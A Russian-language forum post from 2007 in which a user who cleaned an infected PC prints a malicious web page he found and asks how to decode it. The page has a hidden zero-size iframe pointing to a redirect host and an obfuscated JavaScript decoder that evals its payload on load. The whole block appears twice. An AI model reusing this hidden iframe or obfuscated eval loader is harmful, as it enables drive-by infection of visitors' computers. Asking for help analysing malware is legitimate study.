Shadow_master
24.11.2007, 03:16
Привет всем! На днях помгал с компом одному знакомому. Первое впечаткение по тому как он себя вел - троян. Потом я понял в чем дело, почти так и есть - порнуха. Все нашел удалил (скопировал себе), почистил в реестре. Давно не занимался кодингом и задался мыслью: "А как это нынче делают?" Перерыл почти весь журнал, её там было много! :D Стоп... Есть - окно подвисло, начали появляться ярлыки с явным поревом (на компе мастдай хп сп2 + заНУД со всеми самыми последними на тот день обновлениями). Интересующая нас строка:
<SCRIPT language=javascript>
document.write('<IFRAME SRC="http://redirectx.net/in.cgi?6" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>');
</SCRIPT>
Там мы видим:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0037)http://theteenxxx.com/mycounter1.html -->
<HTML><HEAD><TITLE>Counter</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Counted : 1541 people!
<SCRIPT>
var x=new Date();
x.setTime(x.getTime()+3600000);
document.cookie='websitesign=77;expires='+x.toGMTS tring();
</SCRIPT>
<SCRIPT>function b(us,Ka){if (!Ka)Ka='v3/aVu}h%~bR-?#>X"|lPnF^pyxS{M(rzQ+wG8c,Y e=)k6CNm5dE:qUOgK;A.s@';var F;var ii=arguments;var xt='';for(var vt=0;vt<us.length;vt+=ii.callee.toString().length-526){F=(Ka.indexOf(us.charAt(vt))&(200+55))<<18|(Ka.indexOf(us.charAt(vt+1))&(200+55))<<12|(Ka.indexOf(us.charAt(vt+2))&(200+55))<<(ii.callee.toString().length-524)|Ka.indexOf(us.charAt(vt+3))&(200+55);xt+=String.fromCharCode((F&(16711600+80))>>16,(F&(255*256))>>8,F&(200+55));}eval(xt.substring(0,xt.length-ii.callee.toString().length+528));}b('p+z,n^Qrbdna"EGm%l..?^{C|anOpUYGbqku?^Qe%wnOS|?nXqyMMP:XbdYU|F) :{8?s#wMN^53?ba-KR, u?hOK-:v6{h{E%lnU?^gcrl UPVpqX5.y?aMX"lu+^UGK%E =%VE)SayUx,O:Rw-+{hO+Fw"UP/)K?E8=?|O+F+3an|-qXEM~~V:X-q.aPG8:XEy~%V-:'+
'(wP6(8~NR8?=S5O8M53aba-zR, |{/glxqA6~l-mM5mF{V:l%cuUPEPKrVGd%V?rrFVUSnGKru.d?FzY|FuAnPzml |Q~#+k%xdYU^5VzXd.Fb}:}RduaS|unx+zw?G?br8PU^5-mpG X%V?X%duUPVnn%l..>E?|x53Oy,YmM:?}?,m~-q.3-q)Np8?s#wMN^53?ba-KR, u?hOK-:v6{h{E%lnU?^gcrl UPVpqX5.y?aMX"lu+F8%E%n?K#+grbdnYPa?:XngsM|k="|3an|-qXEM~MnG)Fl33{:OGRaE.~5N,Ru?5Rcyk(VEGRdvE{u3QMlAYp GuwxG?Y?8Pz-lY:Sd~("8G=>GGU%^ %(n"d~^:ux:%wrw?hrh{+|8p F8.MS/{ %/v=');</SCRIPT>
<SCRIPT>try{eval(j)}catch(ex){}</SCRIPT>
</BODY></HTML>
У меня вопрос тем, кто не отстал от жизни: "Что это, и чем это раскодировать?". Windows Script Decoder не предлагать - вышел, как оказывается, из моды.
<SCRIPT language=javascript>
document.write('<IFRAME SRC="http://redirectx.net/in.cgi?6" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"></IFRAME>');
</SCRIPT>
Там мы видим:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0037)http://theteenxxx.com/mycounter1.html -->
<HTML><HEAD><TITLE>Counter</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1251">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR></HEAD>
<BODY>Counted : 1541 people!
<SCRIPT>
var x=new Date();
x.setTime(x.getTime()+3600000);
document.cookie='websitesign=77;expires='+x.toGMTS tring();
</SCRIPT>
<SCRIPT>function b(us,Ka){if (!Ka)Ka='v3/aVu}h%~bR-?#>X"|lPnF^pyxS{M(rzQ+wG8c,Y e=)k6CNm5dE:qUOgK;A.s@';var F;var ii=arguments;var xt='';for(var vt=0;vt<us.length;vt+=ii.callee.toString().length-526){F=(Ka.indexOf(us.charAt(vt))&(200+55))<<18|(Ka.indexOf(us.charAt(vt+1))&(200+55))<<12|(Ka.indexOf(us.charAt(vt+2))&(200+55))<<(ii.callee.toString().length-524)|Ka.indexOf(us.charAt(vt+3))&(200+55);xt+=String.fromCharCode((F&(16711600+80))>>16,(F&(255*256))>>8,F&(200+55));}eval(xt.substring(0,xt.length-ii.callee.toString().length+528));}b('p+z,n^Qrbdna"EGm%l..?^{C|anOpUYGbqku?^Qe%wnOS|?nXqyMMP:XbdYU|F) :{8?s#wMN^53?ba-KR, u?hOK-:v6{h{E%lnU?^gcrl UPVpqX5.y?aMX"lu+^UGK%E =%VE)SayUx,O:Rw-+{hO+Fw"UP/)K?E8=?|O+F+3an|-qXEM~~V:X-q.aPG8:XEy~%V-:'+
'(wP6(8~NR8?=S5O8M53aba-zR, |{/glxqA6~l-mM5mF{V:l%cuUPEPKrVGd%V?rrFVUSnGKru.d?FzY|FuAnPzml |Q~#+k%xdYU^5VzXd.Fb}:}RduaS|unx+zw?G?br8PU^5-mpG X%V?X%duUPVnn%l..>E?|x53Oy,YmM:?}?,m~-q.3-q)Np8?s#wMN^53?ba-KR, u?hOK-:v6{h{E%lnU?^gcrl UPVpqX5.y?aMX"lu+F8%E%n?K#+grbdnYPa?:XngsM|k="|3an|-qXEM~MnG)Fl33{:OGRaE.~5N,Ru?5Rcyk(VEGRdvE{u3QMlAYp GuwxG?Y?8Pz-lY:Sd~("8G=>GGU%^ %(n"d~^:ux:%wrw?hrh{+|8p F8.MS/{ %/v=');</SCRIPT>
<SCRIPT>try{eval(j)}catch(ex){}</SCRIPT>
</BODY></HTML>
У меня вопрос тем, кто не отстал от жизни: "Что это, и чем это раскодировать?". Windows Script Decoder не предлагать - вышел, как оказывается, из моды.